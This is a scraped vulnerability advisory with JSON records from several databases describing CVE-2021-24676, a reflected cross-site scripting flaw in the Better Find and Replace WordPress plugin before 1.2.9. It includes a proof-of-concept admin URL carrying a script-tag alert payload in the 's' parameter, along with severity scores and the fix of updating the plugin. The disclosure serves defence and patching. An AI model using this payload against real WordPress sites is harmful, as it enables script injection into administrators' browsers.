Description
The plugin does not escape the 's' GET parameter before outputting back in the All Masking Rules page, leading to a Reflected Cross-Site Scripting issue
### PoC
https://example.com/wp-admin/admin.php?page=cs-all-masking-rules&s;=
Affected Software
Related
{"id": "WPVDB-ID:59589E74-F901-4F4D-81DE-26AD19D1B7FD", "vendorId": null, "type": "wpvulndb", "bulletinFamily": "software", "title": "Better Find and Replace < 1.2.9 - Reflected Cross-Site Scripting", "description": "The plugin does not escape the 's' GET parameter before outputting back in the All Masking Rules page, leading to a Reflected Cross-Site Scripting issue\n\n### PoC\n\nhttps://example.com/wp-admin/admin.php?page=cs-all-masking-rules&s;=\n", "published": "2021-09-06T00:00:00", "modified": "2021-09-06T09:17:06", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://wpscan.com/vulnerability/59589e74-f901-4f4d-81de-26ad19d1b7fd", "reporter": "apple502j", "references": [], "cvelist": ["CVE-2021-24676"], "immutableFields": [], "lastseen": "2021-11-26T19:14:05", "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24676"]}, {"type": "patchstack", "idList": ["PATCHSTACK:9429B58D1FEBCFBC19DF4A85DCC9EFFF"]}, {"type": "wpexploit", "idList": ["WPEX-ID:59589E74-F901-4F4D-81DE-26AD19D1B7FD"]}]}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24676"]}, {"type": "wpexploit", "idList": ["WPEX-ID:59589E74-F901-4F4D-81DE-26AD19D1B7FD"]}]}, "exploitation": null, "affected_software": {"major_version": [{"name": "real-time-auto-find-and-replace", "version": 1}]}, "vulnersScore": 0.2}, "affectedSoftware": [{"version": "1.2.9", "operator": "lt", "name": "real-time-auto-find-and-replace"}], "exploit": "https://example.com/wp-admin/admin.php?page=cs-all-masking-rules&s=<script>alert(/XSS/)</script>", "sourceData": "", "generation": 0, "_state": {"dependencies": 1660004461, "score": 1660007483, "affected_software_major_version": 1666691171}, "_internal": {"score_hash": "bedc60d1cc67eabceffdb926d06de10a"}}
{"cnvd": [{"lastseen": "2022-11-05T07:17:51", "description": "WordPress is the Wordpress Foundation's set of blogging platforms developed using the PHP language. The platform supports the hosting of personal blog sites on PHP and MySQL servers. WordPress plugin is a WordPress open source application plugin. WordPress Better Find and Replace plugin has a cross-site scripting vulnerability, which stems from the lack of proper validation of client-side data by the WEB application. An attacker could exploit the vulnerability to execute client-side code.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-10-09T00:00:00", "type": "cnvd", "title": "WordPress Better Find and Replace plugin cross-site scripting vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24676"], "modified": "2022-01-07T00:00:00", "id": "CNVD-2022-01700", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-01700", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "patchstack": [{"lastseen": "2022-06-01T19:30:37", "description": "Reflected Cross-Site Scripting (XSS) vulnerability discovered by apple502j in WordPress Better Find and Replace plugin (versions <= 1.2.8).\n\n## Solution\n\n\r\n Update the WordPress Better Find and Replace plugin to the latest available version (at least 1.2.9).\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-09-06T00:00:00", "type": "patchstack", "title": "WordPress Better Find and Replace plugin <= 1.2.8 - Reflected Cross-Site Scripting (XSS) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24676"], "modified": "2021-09-06T00:00:00", "id": "PATCHSTACK:9429B58D1FEBCFBC19DF4A85DCC9EFFF", "href": "https://patchstack.com/database/vulnerability/real-time-auto-find-and-replace/wordpress-better-find-and-replace-plugin-1-2-8-reflected-cross-site-scripting-xss-vulnerability", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2022-03-23T15:01:11", "description": "The Better Find and Replace WordPress plugin before 1.2.9 does not escape the 's' GET parameter before outputting back in the All Masking Rules page, leading to a Reflected Cross-Site Scripting issue", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-10-04T12:15:00", "type": "cve", "title": "CVE-2021-24676", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24676"], "modified": "2021-10-08T17:59:00", "cpe": [], "id": "CVE-2021-24676", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24676", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "wpexploit": [{"lastseen": "2021-11-26T19:14:05", "description": "The plugin does not escape the 's' GET parameter before outputting back in the All Masking Rules page, leading to a Reflected Cross-Site Scripting issue\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-09-06T00:00:00", "type": "wpexploit", "title": "Better Find and Replace < 1.2.9 - Reflected Cross-Site Scripting", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24676"], "modified": "2021-09-06T09:17:06", "id": "WPEX-ID:59589E74-F901-4F4D-81DE-26AD19D1B7FD", "href": "", "sourceData": "https://example.com/wp-admin/admin.php?page=cs-all-masking-rules&s=<script>alert(/XSS/)</script>", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}
Better Find and Replace < 1.2.9 - Reflected Cross-Site Scripting
